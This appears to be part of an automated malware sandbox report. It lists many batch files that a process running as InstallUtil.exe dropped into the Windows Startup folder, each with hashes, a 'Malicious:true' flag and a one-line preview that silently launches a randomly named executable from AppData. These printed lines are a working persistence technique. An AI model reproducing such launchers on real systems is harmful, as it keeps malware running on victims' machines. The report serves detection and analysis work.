                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.783044574076702
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5VhSSxEHx/lMVm:fE1wkn23LSKEHxqm
                                                                                                                                                                                                                                MD5:BB8419C70F5077652A68B3E1CEBFB826
                                                                                                                                                                                                                                SHA1:1D00CF31FA7BD2E48DB85F20FB330E56FB3C008B
                                                                                                                                                                                                                                SHA-256:D24B96ABBBC6BB40699D25E1129369F29472CDBBD902A4EC41583B8E2FEB794D
                                                                                                                                                                                                                                SHA-512:A684DBE64512EAE4B9569AD88ECE3A5A99967F04B4F8826484CA422D75A8277D149A444AFBF043BCC1C8B57A6BC9CBA35B448837DCA6E65F3FC027BE7D4130EE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\0DNcwfMmaLL5AZJSs5jeKfoN.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dJvuemiGicObX4Z30kroda9A.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.048822783172895
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5U7oTF0Tn:fE1wkn23U7oT+
                                                                                                                                                                                                                                MD5:44106DE101533B9488E02F835044634B
                                                                                                                                                                                                                                SHA1:43F1C596E1614077440B213FFEB06E1DC37EA23E
                                                                                                                                                                                                                                SHA-256:7CC19400C65B06E28B17C5C68DDC4216BE4D39897F33C3C4B19869301B6E0329
                                                                                                                                                                                                                                SHA-512:028505ADEAEE772DB7A247A63DAAA1251A129EA379145CDED345B03CE8F55A1657DB9F9E84299EE7F43BA719EECDB5CD58E74BA2F2417CA5596C4D7762C27757
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\qtBU2wcdiddM8Ew6K9GV1QbJ.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e0F2LznfDHjVvc1ZIgjGBTfl.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.799267986812411
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5ovDM7oBSpL:fE1wkn23ovDRSF
                                                                                                                                                                                                                                MD5:C997E318422804B5FB6D253EE21F93D6
                                                                                                                                                                                                                                SHA1:8D2B6674E80311148A936803483EB2C359F03BDF
                                                                                                                                                                                                                                SHA-256:C215BF951A1CA2ED67F6BD489BB13B0FB56F66872EA66665E02AAE816234418B
                                                                                                                                                                                                                                SHA-512:CC5AC92661C9E8490CE77059B95F32C61ED7630AD2B905F006206ACB8DAA09A311E0B3F08F38DE7959D361625E603C30FA36F689BBBF0737B66B7BDD1726A8A3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\MzHVcwfiHGLesknyk5lMjLDt.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fPKannmBo94NforWN8ticios.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.898612232787385
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5TpzF9Jl:fE1wkn23tHJl
                                                                                                                                                                                                                                MD5:7C27C20544A096CC4B310DAB113D0740
                                                                                                                                                                                                                                SHA1:9DA6E26BEEF3A3BE74A9FC4500AD8E37B04EDD69
                                                                                                                                                                                                                                SHA-256:71AD1026FCF91D270783362AA791B709838340678C4B20E6F102428114BC35DB
                                                                                                                                                                                                                                SHA-512:5FD4242AAC825686D06A6E01BE9DA68E980EB08BD83B179B7F30F313AAC35939DFFB11A97FB70F9741553AD1526BBE5217C0EA58D8DDC2BF339E5DFC218779B0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\vMDfzN6ieihUJhAninw4nHZX.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fV1IOv3XzX0dw8cL656hlcGA.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.994220736727779
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5fFAO8+yGdcw4CSkdan:fE1wkn23yY4D
                                                                                                                                                                                                                                MD5:743E04D5AFD76688F47240F8DB907283
                                                                                                                                                                                                                                SHA1:AF253508F09B16E9AB450A5A4949B725958DB2E9
                                                                                                                                                                                                                                SHA-256:CDFA56B95BDA73FD33D0CE1743075D0970B524ADCC830629F20215A084310912
                                                                                                                                                                                                                                SHA-512:A17F872F45CA013AD1232ACB0C51D289DF73E7B15B837C1D99A9E47B31C493CDC286FA07C211B57161697AA7563A800E05F20D0464052DD615F896E133CFA627
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\zILQneSJVLXUhxcgTc89dcSy.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fg8k8vWyqYQx0o1Q7REQB6Y1.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.956583247280139
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5UruOoqNA+RCJln:fE1wkn23UlhN9A
                                                                                                                                                                                                                                MD5:1879B432F03E26F52F9B582EF7C0F844
                                                                                                                                                                                                                                SHA1:B58F83DB408C07082C3D271FD0AD2962862F2E1C
                                                                                                                                                                                                                                SHA-256:429E9BA66EEBD2E1516FD8E8ABFD2CA89DFB05856BB62B9912C38C20638044C0
                                                                                                                                                                                                                                SHA-512:2A0497942BAA0C85B602AC1C952281CFA9C653138948858E9BED939FB209F19A10F27D82ACCF1EF0AAB23D8A779CBB0E531DEC9076DC7C2ECEBC2EF362CA6D43
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\1NKkMLyw9h7c8epRkEFEngCg.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gZtCFxlqR0Jhzrk0e43UouaM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8690202910487415
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5uZO1vfGgpJJl:fE1wkn23uZ0f3Jl
                                                                                                                                                                                                                                MD5:8255E9DEF7AB2C5E62BD8CED427CDD83
                                                                                                                                                                                                                                SHA1:46E5CDDF0A709312B310D06C6519A0AA9F579660
                                                                                                                                                                                                                                SHA-256:EB096AA6A821C44899345C7B9023F2FE28E7EF5C37E4599D89905B97B79600C7
                                                                                                                                                                                                                                SHA-512:BA27FACA70E6AF0B85E51CBC8866459AEF5028673723F9C45537A397311679E5249F560AB851DE28A0C5D6E43D1EBDA22B416C15335806CE9D01E904182681F9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\K7OlehBeK7vDe9ywIcEpfFfd.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gf9K0uVqiu13maxJpiTH6V5K.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.945642848698059
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5wrJRPylEXcxL4mn:fE1wkn23wdRJcxLv
                                                                                                                                                                                                                                MD5:F905020DB710AAD2C27C1BAC6464DB92
                                                                                                                                                                                                                                SHA1:E8D3A5C08F00A6D4887FC09BC2AB1362D2F9FFC1
                                                                                                                                                                                                                                SHA-256:2A46EC07AC9CE896B6C1531DB63122DC95D3E321BC917710595F71F5D996938E
                                                                                                                                                                                                                                SHA-512:7E1C68A1AA038E86A792244D351A575A52EA6967414599A89A4369DD3CB1E4F93AAFAE2D213E76681763F3336EA2FCE98669329DCD3070103C6DF921128263D4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\UNl4vFmh5HIxFXbaSLodV9jl.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\huKfpDIvxQDlEFuk0ExAiyiY.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.802162638119942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Lc+xcAsn:fE1wkn23oAs
                                                                                                                                                                                                                                MD5:95D9BB52C66DC3C1FB4773B55F5FE030
                                                                                                                                                                                                                                SHA1:11D5F48153AA99EB0A47125C4DFA404D3B43E81F
                                                                                                                                                                                                                                SHA-256:6C42329CC7F47160E5ABD324A5EE51F94DCF2D7D6BEE187110E9F2A61F046EF6
                                                                                                                                                                                                                                SHA-512:259B64C79659ECEE363974A18FF3DF161FECAC9F58D5D2D048B74B8EE201A9503CD6633143F0C6CA734925767B0512604CD1F7817A817AFDECAD610FA406D908
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\nNmaiuLbBvtjFhtSarVAt2ZV.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3pPAKGnPRFkr8xt7bRSlRjc.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.066867891837193
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5TN2ypMHumLACl:fE1wkn23Z2BHuEl
                                                                                                                                                                                                                                MD5:1BF24334C1555A61C1CFE169DB2E90DF
                                                                                                                                                                                                                                SHA1:B22304A4D00039B8D20A2575A3C3A2B91D0D90A9
                                                                                                                                                                                                                                SHA-256:96908A3FC42FB54B960C5245FCC3E0A2700FAEFE9B6CA946BDBF35E7D5502C64
                                                                                                                                                                                                                                SHA-512:E2B821F8B6EB6A33040DFE005C2C4AA77B30E56203CC78225C44DA1FA8309A202B782E4EAF7752DE1931D2CAD178C4DCA2F5CEE6C68895715CDE5D9B93CE9C46
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k6mBzFjd7L6byeC8koGX6zwd.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.77738718964825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5S4cbcosZdCl:fE1wkn23S4cfKs
                                                                                                                                                                                                                                MD5:16C872533F1E9460366D8AAD3BD7A05F
                                                                                                                                                                                                                                SHA1:D8BB0D47645894F1D152E1549F0911AB89A265FC
                                                                                                                                                                                                                                SHA-256:220E675BBBE8A4B921FBBEF968E9FE86FA6A224C2C5D45FA9EED0CC4CF9F787E
                                                                                                                                                                                                                                SHA-512:35F4D37CE6F5099DEFC703BC0064D9D67086BBB67A46F3F65571E5C743AF78E91C07811863380CC86BA0304564039A04A841CF3A2381EC2051A01FB482CFDAE7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wXxranKwriDbPr8wnfU8IA5G.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYBowvhQTbfkpH7pEHtJjyDD.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.842462914223222
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5LrVJYjkAdAl:fE1wkn23VJukAs
                                                                                                                                                                                                                                MD5:F6E16FBEDAE355EEA71E14647B1955E1
                                                                                                                                                                                                                                SHA1:C18A95E0342B26F7A343BDB29C6165D0A62B4FF4
                                                                                                                                                                                                                                SHA-256:3793A142D057980F7CC7CD0BC3E9E470F62EFC6675CA71FBDEC254E21AB958C6
                                                                                                                                                                                                                                SHA-512:47065767B1CE6D6316C9957E191E307CBFA58F206ED6A9015A05CEC8739C79660D7A1016A04F77C617CED5AE3D4E6A1F0DFD75518B2942B94B51973D2740980A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\nPlq3xTmye2f3pu3slr0k49k.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYlPDGvk41C0TPxT1reEBFhp.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.887671834205306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rRRfekWdd+vMln:fE1wkn23tRfJLEl
                                                                                                                                                                                                                                MD5:46BC1CBAE1657D5C040B09E480FDD544
                                                                                                                                                                                                                                SHA1:819CD117CDF807B045356E86B521F7F208E52B50
                                                                                                                                                                                                                                SHA-256:B9CD3E54F4941D0D16378E71EFD44AA1832BF9DE968A3F85241352BDF8CD4643
                                                                                                                                                                                                                                SHA-512:33AE8E0F51BAFF1B0D5186A092505AA2E4109D712C97191295ABF6F043F1FB4037BA1D3AB169051A9D541882F0FBAC3C5E967AD58F44249EAFC94BB2AA5B3C39
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NQMtpPx9qXPy8v0LlF2Kjrle.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.802162638119942
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rk8uGzJQQs:fE1wkn23RuG2
                                                                                                                                                                                                                                MD5:6D9F306EE7E69B44FD102D4107078997
                                                                                                                                                                                                                                SHA1:A04A6368FEF17CA442B36E1366F92F98E3E69523
                                                                                                                                                                                                                                SHA-256:C6038C55F1973B2EB4D7720E60F40AF879B08727FAA9C369CFB91F97C2516E88
                                                                                                                                                                                                                                SHA-512:8AD15896D434A3A2F64C8826C4FD2A65F8C04A48F1D0C98B7030DB663E86286592EB1B1BC0C08A5FA6E8654B2A0523CB36A592B9B2C9DF92D0DC0A8952DCD2EB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\NAHYKKwmljWteoQSQ7emQ5vj.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kvtHxdKcRoDqPC1gLyjQuWO9.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.905716942869603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5PqVwLXoc95L:fE1wkn23iV+XoE
                                                                                                                                                                                                                                MD5:DCA4D40D0BC7C315C3A0BF5A60C3F185
                                                                                                                                                                                                                                SHA1:ADE4CA31AD37A474E246FC0E3E3830EC761E2593
                                                                                                                                                                                                                                SHA-256:8FFD01801D3853C761568259CA985BF790EEECD051374E7726F7F032E8054BDB
                                                                                                                                                                                                                                SHA-512:472E75F90A188F5BCAA55D9E7C852EED5F5ECBD6E80AB1D732A9F1941B0BBDFD5D1FD29DDA02B36FB850DACC51F5F988C7F0EF05FED04B88620EF7811E6FFEED
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\jNfRjwpCJu7ns5MyIyIgDq2I.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l1jIVrUtFS0lwUMqub3ii2o5.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871074051194774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5L3EIq7c2PMdm:fE1wkn23UT
                                                                                                                                                                                                                                MD5:C14153ADE9E20219F8212834EE4CF820
                                                                                                                                                                                                                                SHA1:E31E267B766AB72020275A803DD9CD6656ED691C
                                                                                                                                                                                                                                SHA-256:0EABC88A12FBB616C731EC67960D2B8BEB15B06951A8DA8C0831F2970592161C
                                                                                                                                                                                                                                SHA-512:71228448ECBA96BD7F34B71A769CB0BA83192B9319D4E99B89A2D96A1CEA4AD084D0D7B86358D0B0E5E37E2DA3DA766C4D0DA18713485E995A1B1054AFE06A56
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\nacv1V5amvW0txqp8nJ7QSVf.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lJKdZUxmZnY2NKvxLXDrjSku.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.949776292283334
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J52CWh/jcxCFIkdan:fE1wkn232CmgFD
                                                                                                                                                                                                                                MD5:E3FB6DEB9B6418081EAACCF14173D405
                                                                                                                                                                                                                                SHA1:E308E3C429BB0892F059D76465921E900C44F8A9
                                                                                                                                                                                                                                SHA-256:DC0064726119A8A9C99BCD901731B756730657F9F5688525962749D2340614AA
                                                                                                                                                                                                                                SHA-512:34E0FF58CBFC7CCCA7A198EA8077F3902D3A0330B07A1D6CB4F235741EDE996D63E63483F83D02DDF0246EE5859ABA638C440A720A7EA7118E33894E90896D87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lnNEauUE5ISjaPQmGBOxsDf3.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.927597740033761
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5jIjwWTNqFln:fE1wkn23c0UNqn
                                                                                                                                                                                                                                MD5:7D8E9ADDCF10AC3EB7972CA4CF12E168
                                                                                                                                                                                                                                SHA1:980779EC2F2EAAD1EC02D503922D50E251D9FD69
                                                                                                                                                                                                                                SHA-256:1851FE3EBE447AC8630655EB63338F19D830C70EDB20084FF3552BA1B54C9689
                                                                                                                                                                                                                                SHA-512:57C0ACC541E6CADDD08328DBC729B61F912166C09FAC7E9A6B1C75114B0947781D570F22C03DC88786D396B76EA584D1E4CC25806F5855007971C2140DBDA0B6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FPqrFrEMEodivHfNwvaAYSOn.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mDRxpt9F25D9uZbeaJsspjpJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.908737475466189
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5hogi98nZFUASkdan:fE1wkn23fisa/D
                                                                                                                                                                                                                                MD5:806F535CC0623C951A2A29CA38C41D8F
                                                                                                                                                                                                                                SHA1:F19B921BB830A71FBAEDFCFA4718AB15602684D8
                                                                                                                                                                                                                                SHA-256:9C79CE4515BCE49B0B245EB2326690EB8B3A1387992CEF554CD379D585FA591A
                                                                                                                                                                                                                                SHA-512:D6FC551B498972F0A6ACDFAA9F6A346850C2066BC7676DB96CF4D279D735D9B1185B328E3F0A801B660DCC5EFA7F7EA75081D3E57CBA081169B619E76C205B4C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\DMECl6rKVeXO0VOyuijXmPsf.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mEdWQV0gAnTaAGqJjmojBkRB.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.836805529794771
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5gtOhlzdwdAl:fE1wkn23gIR
                                                                                                                                                                                                                                MD5:0D1F672F71A242A3B2F4B6C5E6AF17E8
                                                                                                                                                                                                                                SHA1:141E0B7B7644AA6ADB889A6DC25490824D91DFBA
                                                                                                                                                                                                                                SHA-256:842255F077198E68DE336522EACFDBF1CEC76C04B02CEFD7D0C99BF76664FFDE
                                                                                                                                                                                                                                SHA-512:0BF02F42543B7E271F8DF9C9F715E5A3A13B7D8CAFCC3EA580DB1BA85F3AF88A117D4014814AE966485F54C589CE3FA47073733DE4B44BE6A8BA29A5E41EF6C8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\EHUfUZeP6l6RDehwxBVxTksR.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mm7BesjycQWolvzqUxLCJN2V.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.829700819712552
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5HmsU+jN/IHF:fE1wkn23Av
                                                                                                                                                                                                                                MD5:60D4FBC28D842C23D6C562BBAF9EA6C4
                                                                                                                                                                                                                                SHA1:428083C6080AB64C3B05A11AC4D553400EB3E8EE
                                                                                                                                                                                                                                SHA-256:C8488567C24C67F97A832C5DC2328BD8D34E03897701EC49EFC5D8BB06F5C44A
                                                                                                                                                                                                                                SHA-512:7B8037A7B72EC88CB41B51D82FF8E710E29A196E2599621138D8E43C6DF546863C26A3EC8B4BF3D0313B16EDA3CA9A3972E040AB86BDA056C4267E44D9385932
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
